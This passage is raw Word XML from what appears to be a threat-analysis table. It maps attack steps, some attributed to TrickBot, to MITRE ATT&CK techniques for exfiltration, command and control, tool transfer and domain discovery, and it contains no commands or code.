              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001207D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E76EDB5" w14:textId="2611BB97" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001207D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001207D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001207D8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="638A2EFD" w14:textId="35CBA437" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47399207" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A3E286" w14:textId="018C497C" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5835E933" w14:textId="647BB37F" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
            <w:r w:rsidR="00822110">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27401E0C" w14:textId="3FC692C4" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:r>
              <w:t>[2] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C42812" w:rsidRPr="004A553D" w14:paraId="5C443C03" w14:textId="77777777" w:rsidTr="00EC7F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D43239F" w14:textId="69990DFC" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13BA77DC" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7394F861" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="350989B0" w14:textId="0E8FA5EF" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00B22734" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49F406DE" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31B85C00" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08AE2E51" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D338363" w14:textId="03096B8D" w:rsidR="00C42812" w:rsidRPr="004A553D" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C42812">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C42812">
              <w:t xml:space="preserve"> downloads modules for collecting local system information and scouting the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C42812" w:rsidRPr="00D3685E" w14:paraId="10187916" w14:textId="77777777" w:rsidTr="00EC7F41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40BF3122" w14:textId="1EAA166F" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CCAA5D" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23B0706D" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D5D9BF" w14:textId="0B4357A8" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="210F3E31" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D1B46B" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="680345CF" w14:textId="77777777" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE/IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="609A0757" w14:textId="1B6FC037" w:rsidR="00C42812" w:rsidRPr="00D3685E" w:rsidRDefault="00C42812" w:rsidP="00EC7F41">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] See above </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001207D8" w:rsidRPr="005B41A3" w14:paraId="4BE61F39" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BD72C16" w14:textId="63B59D8B" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0056392C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78C31444" w14:textId="4D7DBFD1" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EED7175" w14:textId="2F195170" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1482 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Domain Trust Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26267FFB" w14:textId="14D9D92E" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2786E09A" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B4DE9C" w14:textId="5E63DD46" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="0036799F" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E087802" w14:textId="408AC6B6" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F0A492" w14:textId="7651B591" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="001207D8" w:rsidRPr="005B41A3">
              <w:t xml:space="preserve">“Enumerating domain trusts with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001207D8" w:rsidRPr="005B41A3">
              <w:t>nltest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001207D8" w:rsidRPr="005B41A3">
              <w:t xml:space="preserve"> “</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001207D8" w:rsidRPr="005B41A3" w14:paraId="2730E01F" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D64D4B8" w14:textId="5A07ADBC" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="0056392C" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60415BC7" w14:textId="7E051D86" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="466ABF54" w14:textId="634C33DB" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1087.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B41A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Account Discovery: Domain Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="083AD1C9" w14:textId="4DE29C2B" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00D4300F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7055EA7A" w14:textId="77777777" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="001207D8" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31EF77C8" w14:textId="382CADAF" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="0036799F" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="538EBE72" w14:textId="397B5E50" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="262CFE9F" w14:textId="6BEF760B" w:rsidR="001207D8" w:rsidRPr="005B41A3" w:rsidRDefault="00B22734" w:rsidP="001207D8">
